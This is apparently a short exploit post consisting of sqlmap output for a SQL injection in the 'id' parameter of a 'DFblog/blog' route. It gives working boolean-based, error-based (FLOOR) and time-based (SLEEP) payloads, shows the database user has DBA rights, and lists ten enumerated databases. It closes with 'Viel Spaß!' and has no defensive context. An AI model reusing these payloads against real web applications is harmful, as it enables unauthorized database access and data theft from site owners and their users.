Target:
(GET)sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: route=DFblog/blog&id=56' AND 6035=6035-- HGhT Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: route=DFblog/blog&id=56' AND (SELECT 2381 FROM(SELECT COUNT(*),CONCAT(0x7162707071,(SELECT (ELT(2381=2381,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DUJQ Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: route=DFblog/blog&id=56' AND SLEEP(5)-- euLJ --- back-end DBMS: MySQL >= 5.0 current user is DBA: True --- back-end DBMS: MySQL >= 5.0 available databases [10]: [*] df_forum [*] df_forumv2 [*] df_opencartv1 [*] df_opencartv3 [*] df_wikiv2 [*] df_wikiv3 [*] information_schema [*] mysql [*] performance_schema [*] sys
Viel Spaß!